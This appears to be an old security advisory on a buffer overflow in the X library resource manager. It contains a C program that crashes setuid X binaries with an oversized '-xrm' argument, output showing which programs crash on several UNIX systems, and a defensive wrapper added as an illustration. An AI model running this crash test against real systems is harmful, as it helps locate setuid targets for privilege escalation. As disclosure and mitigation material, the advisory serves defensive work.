COMMAND

    X Library

SYSTEMS AFFECTED

    Most UNIX systems

PROBLEM

    David Hedley found the following.  There is a serious problem in the
    resource  manager  routines  in  the  X  libraries  on  most  UNIX
    platforms.  From first impressions, it looks like pretty much every
    suid program linked against the X libraries that uses the X resource
    manager routines is vulnerable to buffer overflow exploits, even  if
    the programs themselves are secure.

    To test the extent of this, compile the following program and  run
    it  with  various  X  suid  programs  as  parameters. If you get a
    segmentation  fault  or  bus  error,  then  you  are   potentially
    vulnerable.

    ----------------------- testx.c ---------------------

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        char *env[] = {NULL};      /* empty environment for the child */
        char buffer[18000];        /* Irix has a 20k limit for environment+args */

        if (argc < 2)
            exit(1);

        /* Fill the argument with 'a's, keeping room for the terminator. */
        memset(buffer, 'a', sizeof buffer);
        buffer[sizeof buffer - 1] = '\0';

        /* Hand the oversized string to the program as an -xrm resource
         * specification; the NULL pointer terminates the argument list. */
        execle(argv[1], argv[1], "-xrm", buffer, (char *)NULL, env);
        perror("exec failed");
        return 1;
    }

    ---------------------- end testx.c ----------------------

    And here we have it in action on Irix:

        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xterm
        zsh: bus error  ./testx /usr/bin/X11/xterm
        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/cdplayer
        zsh: bus error  ./testx /usr/bin/X11/cdplayer
        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xconsole
        zsh: bus error  ./testx /usr/bin/X11/xconsole
        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xlock
        Xlib: connection to ":0.0" refused by server
        Xlib: Client is not authorized to connect to Server
        xlock: unable to open display :0.
        warlock:~/warlock/src/tmp ->

    Here we can see that xlock  is not vulnerable to this attack,  but
    the others potentially are.

    On Solaris:

        maxx:~/tmp ->./testx /usr/dt/bin/dtprintinfo
        zsh: bus error  ./testx /usr/dt/bin/dtprintinfo
        maxx:~/tmp ->./testx /usr/dt/bin/dtaction
        zsh: bus error  ./testx /usr/dt/bin/dtaction

    On XFree86 (tested on FreeBSD 2.2.2):

        inferno:~/tmp ->./testx /usr/X11R6/bin/xlock
        zsh: segmentation fault  ./testx /usr/X11R6/bin/xlock
        inferno:~/tmp ->./testx /usr/X11R6/bin/color_xterm
        zsh: segmentation fault  ./testx /usr/X11R6/bin/color_xterm
        inferno:~/tmp ->./testx /usr/X11R6/bin/xterm
        zsh: segmentation fault  ./testx /usr/X11R6/bin/xterm

    The xlock version there was the latest version (xlockmore-4.02).

    For Linux/Slackware-3.1:

        % uname -a
        Linux xwing 2.0.0 #5 Fri Feb 21 13:01:20 PST 1997 i486
        % /tmp/xx /usr/X11/bin/xload
        Segmentation fault
        % /tmp/xx /usr/X11/bin/xlock
        Segmentation fault
        % /tmp/xx /usr/X11/bin/xterm
        Segmentation fault

    For RedHat:

        $ cat /etc/redhat-release
        release 4.1 (Vanderbilt)
        $ uname -a
        Linux turing.imm.net 2.0.30 #3 Sat Apr 26 22:55:36 MET DST 1997 i686
        $ find /usr/X11R6 -perm +6000 -exec ls -l {} \;
        -rws--x--x   1 root     root       144868 Feb 13 03:49 /usr/X11R6/bin/xterm
        -rws--x--x   1 root     root       159472 Nov 20  1996 /usr/X11R6/bin/kterm
        -rwsr-xr-x   1 root     bin        710284 Feb 19 07:54 /usr/X11R6/bin/Xmetro
        -r-sr-xr-x   1 root     root        10464 Dec 19 01:01 /usr/X11R6/bin/XConsole
        -rwsr-xr-x   1 root     root        53464 Jan 31 23:16 /usr/X11R6/bin/rxvt
        -rwxr-sr-x   1 root     uucp        98364 Nov 21  1996 /usr/X11R6/bin/seyon
        -rwxr-sr-x   1 root     daemon     181436 Nov 20  1996 /usr/X11R6/bin/xbill
        -rws--x--x   1 root     root       136504 Nov 20  1996 /usr/X11R6/bin/nxterm
        -rwsr-xr-x   1 root     bin        477408 Aug 16  1996 /usr/X11R6/lib/X11/AcceleratedX/arch/LINUX/Xaccel

        $ ./testx /usr/X11R6/bin/xterm
        Segmentation fault
        $ ./testx /usr/X11R6/bin/kterm
        ^[[ASegmentation fault
        $ ./testx /usr/X11R6/bin/XConsole
        Segmentation fault
        $ ./testx /usr/X11R6/bin/rxvt
        rxvt: bad option "-xrm"
        rxvt: bad option "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$
        [spam]
        Usage v2.19:
          rxvt [-help]
            [-display displayname] [-geometry geom] [-/+rv] [-bg color] [-fg color]
            [-fn fontname] [-iconic] [-name string] [-title string] [-n string]
            [-cr color] [-/+ls] [-/+sb] [-sl number] [-/+ut] [-/+vb] [-C]
            [-e command arg ...]

        $ ./testx /usr/X11R6/bin/seyon
        >> Warning: Could not execute `seyon-emu.
        >> Notice: Falling to `xterm'.
        >> Error: Could not execute `xterm'.
        >> Notice: Giving up.
        $ ./testx /usr/X11R6/bin/xbill
        Segmentation fault
        $ ./testx /usr/X11R6/bin/nxterm
        Segmentation fault

SOLUTION

    As for solutions: it is time for wrappers.  The AUSCERT overflow
    wrapper can be found at:

    ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper/overflow_wrapper.c

    or

    http://cegt201.bradley.edu/~im14u2c/wrapper/
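
    As an added illustration of the wrapper approach (this is not the
    AUSCERT tool and not part of the original advisory), the program
    below refuses to exec the real binary when any command-line argument
    or environment string exceeds a fixed length, which is what defeats
    the oversized -xrm argument used by testx.c above.  REAL_PROG,
    MAX_ARG_LEN and first_overlong are assumed names chosen for this
    example.

```c
/* Added example: a minimal argument-length-limiting wrapper in the spirit
 * of the AUSCERT overflow_wrapper.  Illustrative code, not the AUSCERT tool;
 * REAL_PROG and MAX_ARG_LEN are assumed values. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Hypothetical path of the renamed, wrapped program. */
#define REAL_PROG   "/usr/X11R6/bin/xterm.real"
/* Longest argument or environment string the wrapper passes through. */
#define MAX_ARG_LEN 1024

/* Return the index of the first string in a NULL-terminated vector whose
 * length exceeds max_len, or -1 when every string is within the limit. */
int first_overlong(char **vec, size_t max_len)
{
    int i;
    for (i = 0; vec[i] != NULL; i++) {
        if (strlen(vec[i]) > max_len)
            return i;
    }
    return -1;
}

int main(int argc, char **argv)
{
    int bad;
    (void)argc;

    bad = first_overlong(argv, MAX_ARG_LEN);
    if (bad >= 0) {
        fprintf(stderr, "%s: argument %d longer than %d bytes, refusing to run\n",
                argv[0], bad, MAX_ARG_LEN);
        return 1;
    }
    bad = first_overlong(environ, MAX_ARG_LEN);
    if (bad >= 0) {
        fprintf(stderr, "%s: environment string %d longer than %d bytes, refusing to run\n",
                argv[0], bad, MAX_ARG_LEN);
        return 1;
    }

    /* Everything is within bounds: hand off to the real program unchanged. */
    execve(REAL_PROG, argv, environ);
    perror("execve");
    return 1;
}
```

    In use, the original program is renamed to REAL_PROG and the wrapper
    is installed in its place with the same ownership and setuid mode.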